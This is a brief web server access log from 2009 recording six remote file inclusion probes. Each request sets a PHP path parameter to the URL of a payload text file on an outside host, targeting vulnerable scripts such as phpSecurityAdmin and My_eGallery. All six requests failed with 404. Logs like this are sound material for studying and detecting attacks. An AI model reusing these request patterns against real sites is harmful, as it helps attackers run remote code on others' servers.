213.3.26.176 - - [11/Nov/2009:22:36:16 -0600] "GET /e404.php?DOCUMENT_ROOT=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
66.163.197.88 - - [11/Nov/2009:22:40:54 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
66.163.197.88 - - [11/Nov/2009:22:40:54 -0600] "GET /logs/access_log.1251244800//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
66.163.197.88 - - [11/Nov/2009:22:40:54 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.163.197.88 - - [11/Nov/2009:22:41:00 -0600] "GET /logs/access_log.1249776000//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.vip-united.de///redaxo/include/addons/one.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
157.100.230.82 - - [11/Nov/2009:22:42:44 -0600] "GET /logs/access_log.1231200000/My_eGallery/public/displayCategory.php?basepath=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
